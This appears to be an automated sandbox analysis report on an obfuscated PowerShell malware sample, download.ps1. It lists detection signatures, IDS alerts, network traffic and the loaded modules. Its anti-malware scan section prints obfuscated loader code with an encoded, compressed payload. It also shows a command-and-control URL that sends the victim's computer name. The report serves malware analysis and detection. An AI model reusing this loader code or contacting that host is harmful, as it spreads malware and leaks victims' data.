Edit tour

Windows Analysis Report
download.ps1

Overview

General Information

Sample name:	download.ps1
Analysis ID:	1561504
MD5:	13850ed56e3bfaf6ef04129944ce5d9d
SHA1:	02a35d9c99f37d249a5f67ea365b59050d7b8643
SHA256:	6876e8571f2ef061a2783259715a5f6c8649df295b0a4828cacd19ca00eff73f
Tags:	KongTukeps1user-monitorsg
Infos:

Detection

Score:	84
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

AI detected suspicious sample

Loading BitLocker PowerShell Module

Queries Google from non browser process on port 80

Queries memory information (via WMI often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Contains long sleeps (>= 3 min)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sigma detected: Change PowerShell Policies to an Insecure Level

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

powershell.exe (PID: 5332 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Sigma Signatures

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 5332, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 5332, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE TA582 Domain in DNS Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-23T15:56:05.143444+0100	2859125	1	Domain Observed Used for C2 Detected	192.168.2.4	52621	1.1.1.1	53	UDP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://bkkeiekjfcdaaen.top/7umlt3rvkyhtr.php?id=user-PC&key=107945053478&s=527

Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: download.ps1

ReversingLabs: Detection: 13%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 95.4% probability

Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbt Windows PC source: powershell.exe, 00000000.00000002.1854010170.0000017173254000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Automation.pdb source: powershell.exe, 00000000.00000002.1850870236.00000171730E8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1850870236.00000171730E8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.pdb@ source: powershell.exe, 00000000.00000002.1850870236.00000171730E8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.1852942293.00000171731F8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbCLSID\{EB87E1BD-3233-11D2-AEC9-00C04FB68820}\InprocServer32 source: powershell.exe, 00000000.00000002.1850870236.00000171730E8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbhI source: powershell.exe, 00000000.00000002.1854010170.0000017173274000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1852942293.00000171731F8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1854010170.0000017173274000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1841331335.0000017170F3A000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2859125 - Severity 1 - ETPRO MALWARE TA582 Domain in DNS Lookup : 192.168.2.4:52621 -> 1.1.1.1:53

Queries Google from non browser process on port 80

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

HTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.google.com Connection: Keep-Alive

Source: Joe Sandbox View

IP Address: 168.100.10.140 168.100.10.140

Source: global traffic	HTTP traffic detected: GET /7umlt3rvkyhtr.php?id=user-PC&key=107945053478&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: bkkeiekjfcdaaen.topConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.google.comConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /7umlt3rvkyhtr.php?id=user-PC&key=107945053478&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: bkkeiekjfcdaaen.topConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.google.comConnection: Keep-Alive

Source: powershell.exe, 00000000.00000002.1802473956.0000017101EC5000.00000004.00000800.00020000.00000000.sdmp

String found in binary or memory: *href=https://www.youtube.com/?tab=w1><spanX equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: bkkeiekjfcdaaen.top
Source: global traffic	DNS traffic detected: DNS query: www.google.com

Source: powershell.exe, 00000000.00000002.1802473956.0000017100228000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://$0zlj8fwiqx1ant6/$evdwf3lj9btnqu8.php?id=$env:computername&key=$lcwpdjugbir&s=527
Source: powershell.exe, 00000000.00000002.1802473956.00000171017F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://0.google.
Source: powershell.exe, 00000000.00000002.1802473956.00000171017F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://0.google.com/
Source: powershell.exe, 00000000.00000002.1802473956.0000017101780000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1802473956.00000171014E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://bkkeiekjfcdaaen.top
Source: powershell.exe, 00000000.00000002.1802473956.00000171014E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://bkkeiekjfcdaaen.top/7umlt3rvkyhtr.php?id=user-PC&key=107945053478&s=527
Source: powershell.exe, 00000000.00000002.1850710578.0000017172FF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000000.00000002.1802473956.0000017101EC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://maps.google.com/maps?hl=en&tab=wl
Source: powershell.exe, 00000000.00000002.1830918024.0000017110072000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.1802473956.0000017100228000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1802473956.00000171017A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1830918024.0000017110072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1802473956.000001710236C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1802473956.000001710235D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1802473956.0000017102376000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1802473956.000001710269F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1802473956.000001710237B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1802473956.0000017101EC5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1802473956.000001710268F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schema.org/WebPage
Source: powershell.exe, 00000000.00000002.1802473956.00000171017F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schema.org/WebPageX
Source: powershell.exe, 00000000.00000002.1802473956.0000017100228000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.1802473956.0000017100001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1802473956.0000017100228000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000000.00000002.1802473956.0000017100228000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1802473956.0000017101EC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.blogger.com/?tab=wj
Source: powershell.exe, 00000000.00000002.1802473956.0000017101780000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1802473956.000001710178A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1802473956.000001710179E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com
Source: powershell.exe, 00000000.00000002.1802473956.0000017101EC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/history/optout?hl=en
Source: powershell.exe, 00000000.00000002.1802473956.0000017101EC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/mobile/?hl=en&tab=wD
Source: powershell.exe, 00000000.00000002.1802473956.0000017101EC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.google.com/preferences?hl=enX
Source: powershell.exe, 00000000.00000002.1852942293.00000171731F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000000.00000002.1802473956.00000171017F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://0.google
Source: powershell.exe, 00000000.00000002.1802473956.00000171017F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://0.google.com/
Source: powershell.exe, 00000000.00000002.1802473956.0000017101EC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=http://www.google.com/&ec=GAZAA
Source: powershell.exe, 00000000.00000002.1802473956.0000017100001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.1802473956.00000171017A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1830918024.0000017110072000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000000.00000002.1802473956.0000017101EC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://books.google.com/?hl=en&tab=wp
Source: powershell.exe, 00000000.00000002.1802473956.0000017101EC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://calendar.google.com/calendar?tab=wc
Source: powershell.exe, 00000000.00000002.1830918024.0000017110072000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1830918024.0000017110072000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1830918024.0000017110072000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.1830918024.000001711022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1802473956.00000171017F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1802473956.000001710178A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1830918024.0000017110072000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: powershell.exe, 00000000.00000002.1802473956.0000017101EC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/?usp=docs_alc
Source: powershell.exe, 00000000.00000002.1802473956.0000017101EC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/?tab=wo
Source: powershell.exe, 00000000.00000002.1802473956.0000017100228000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1830918024.0000017110072000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
Source: powershell.exe, 00000000.00000002.1802473956.0000017101996000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24X
Source: powershell.exe, 00000000.00000002.1830918024.000001711022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1830918024.0000017110001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1802473956.00000171017F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1802473956.00000171017A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1830918024.0000017110072000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
Source: powershell.exe, 00000000.00000002.1802473956.0000017101EC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96X
Source: powershell.exe, 00000000.00000002.1802473956.0000017101EC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?tab=wm
Source: powershell.exe, 00000000.00000002.1802473956.0000017101EC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://news.google.com/?tab=wn
Source: powershell.exe, 00000000.00000002.1830918024.0000017110072000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.1802473956.0000017101EC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://photos.google.com/?tab=wq&pageId=none
Source: powershell.exe, 00000000.00000002.1802473956.0000017101EC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://play.google.com/?hl=en&tab=w8
Source: powershell.exe, 00000000.00000002.1802473956.00000171018AF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/
Source: powershell.exe, 00000000.00000002.1802473956.0000017101EC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://translate.google.com/?hl=en&tab=wT
Source: powershell.exe, 00000000.00000002.1802473956.0000017101EC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/finance?tab=we
Source: powershell.exe, 00000000.00000002.1802473956.0000017101EC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/imghp?hl=en&tab=wi
Source: powershell.exe, 00000000.00000002.1802473956.0000017101EC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/intl/en/about/products?tab=whX
Source: powershell.exe, 00000000.00000002.1802473956.0000017101EC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/shopping?hl=en&source=og&tab=wf
Source: powershell.exe, 00000000.00000002.1802473956.0000017101EC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/webhp?tab=ww
Source: powershell.exe, 00000000.00000002.1802473956.0000017101996000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1830918024.0000017110001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1802473956.00000171017F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1802473956.00000171017A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1830918024.0000017110072000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: powershell.exe, 00000000.00000002.1802473956.0000017101996000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.comX
Source: powershell.exe, 00000000.00000002.1802473956.0000017101EC5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?tab=w1

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD9B7F7BD6	0_2_00007FFD9B7F7BD6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD9B7F8982	0_2_00007FFD9B7F8982
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD9B8B90D9	0_2_00007FFD9B8B90D9

Source: classification engine

Classification label: mal84.evad.winPS1@2/7@2/2

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2912:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xonzhs1n.zy5.ps1

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $ui95wpxajysqlbz.(([char[]]@((8517-(3725+4725)),(408480/3680),(298928/2669),(4385-(5146-882)),(-2217+(12005-9704)),(2055-(-245+2189))) -join ''))( $0ebt7wjahvmkiu3 ) $ui95wpxajysqlbz.(([char[]]@((5427/(5610-5529)),(621000/5750),(8502-8391),(304060/2644),(-9832+(-299+10232))) -join ''))()$u5xml7o4icby3fd.(([char[]]@((86363/(-8737+(2687+7339))),(-5635+5743),(1114551/(84866532/8452)),(-7930+8045),(-2942+3043)) -join ''))()[byte[]] $pz7wdvy85htgbf2 = $0ebt7wjahvmkiu3.(([system.String]::new(@((-7019+(8772-1669)),(377-266),(4038-3973),(8310-(3753+(10909-6466))),(-5993+6107),(99231/1023),(-8375+8496)))))() $n0mgyi1tpz3vfr2=$pz7wdvy85htgbf2 return $n0mgyi1tpz3vfr2}[System.Text.Encoding]::ascii.((-join (@((-5565+(13763-8127)),(-6789+(9794-(12525-(60727752/(19510392/3091))))),(701452/(15735-(14364-4676))),(-1995+2078),(7536-(15768-(8328+20))),(627228/(10250226/1863)),(-1727+(11883-10051)),(-8857+(85347906/9518)),(-1165+(2629-(11470-10109))))| ForEach-Object { [char]$_ })))((vcknx6aqz1b3fhuodyim0p849s5 "KLtgOW8xcHUwZJv4bl80Xh2331b0m5cCBwO1AFELr8tsdCQDpfk9X+/JUmKydWYxfJJ+a81r5snJkwoMSpdNa0kcS7wM7BLRzMTfbdJ6JYAjE4jTyH72hddJAI/Wj/GsSYwQwYvDiabPQ82UzLcHNggml3obqjmYwLcTHpQW52K7Gw6YxtXL7qDeH4pJG66c1OU3FzGPCg7sO0gQDw3URNyKy4jh99gNiE2QzZvDq5qKn6GO4ee+RTFNBQTDsQAE2K0zj07UroCDoMm8xru6cuVUuagxmuPZnAVH4nuC6xedPRnKDuWyrwK6TfCGCNF9Ra7eiiBUqo9kFqjUivZerq1WqYpM9/2fl9ei5oinLe5uFcwkmhWl4rNSlGQF3Q4GKJLVHptjltivJtUOTa9nDLc2FYuczZL9xCIi9YT6a+oIM2i8WpGpnIXolKm2kyXYm1EPomVkC/qKHCA/RD/GieApDeh3TYCB+syE24NNg5ILi5j+Vd31HIqjM34IRuN/az8jEN7rai8aFdA2Gve+6t38HLoNM6CB6kit9dHq1GLeW6iCVNk7clbo3wxpaIpSxjSPQjZbhaSqOKw9aWtHwzhcDDv4eGePa6BmpqL9WbP6+qQMuY+ThfHPLA34MGywTKMnkNsUlt98lJja8yYSkyI+BkDRwaDNQNVys1IcdLukU+3YjqSMc9NLNiK6DPWNRG3U6nxzlZA+V6E5RNzO3PHF5Gtpatr+n9SyL62SGiw/M2ylDoRwYRqZBvrld2RCemo62IFMmcT6us914T1u3pdIX+tXlR9HtZ2OKCkU9ishYopIe3TsfG6+vsgaUQ3MZNBqejRNhrCq8isCo2u6MjSY1Vv5H1lomK0nMbpK0kBOn7ZzBVun5OHmy6dfFr01kCOFlEVTqDa6iA6Gq9aO8ufoJhb5Gl9GzJuPgJTTvu5DA7HkeIdPvqSGi6h7O+qasK/GmK9XrsrqvBkc7swcy43QyyK7+osexdCES9WOUawvjfoyQvdVfVj2rrZavVz4Hoh4H2FZ15Zb5aKS4qMW3Ra5sVfSutCi0s6cwNL8X0JLimAK2Xgz5/8ll+TEv8ejJaqj4xRXm86vMqCrtHYg7r2XPJ3aAguvNBnZy5aV4bUUQDNokGPhVr26b4mqEatfCU2Z36kymctHLZe3P7Rob/b5lLvopvcEmkxzu0g8sDYjuTTNE63nSiagN0WELKBeWLF62IyHZhembG1i2eq6wdCiB/JT63n8qA0QypXPpnXP22j9ys2pipLysxNHd2bcztGlWJDDnkKzr4WQEO8VxJrIjqgi2BfPCtuZ5DZtcllKRqd3vgHrfU8QqW1AvtJqRv5JI8MjgfEPxDDBJVHMQqISg425lI+mXhScJU3qUzZpT38YuZ6Z8dfTIT/2MGGYY7vf9faSm9FWaaojRfFWg/+JevL6vUQznmeIqEscGwPuA/L7EO8T5uKcCAvgWKmoSqNFl/ig3Rz6kte0pidQchp7WUA3tSwiEU7M9pwvWJj+lDb3dToVuS3RMqxpF7DjBoGAqeYOYua3RQdb/YxGCVXMZptmkDhJwx3iHpu2jrAJdCqnDzmFcnWxIgxyCUiHhUdYZd3UYStn76CcJh58bn9PsUX6NJmu52ww+DadxyCSgg/GV7d08V8yhnmtKZLijHYi4p6G3YWi85JF27c/4cqAdQ3Xg6rvHKS0CvYfxPKfPyDHDN57J3NpLI/ox9klCJBT/cMxe8RE1L3bLjSbBEaXUMeFv/RGlheQqh/Q0cPc/rs6RP4ZNxptGDvkfLxBoVKZfa8nQabsnDIFD9DYJ0z+l0W8NvJnwsAbETuh/6usBYZVwzT/9/qmFDnRIaOnqFcHKCWokK2MdkTo5x9pc8ukwAVvJ3xLRUymHNq0Z652B9WvtYHKferJeZ+0AvCN/wXpOHt

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: download.ps1

ReversingLabs: Detection: 13%

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
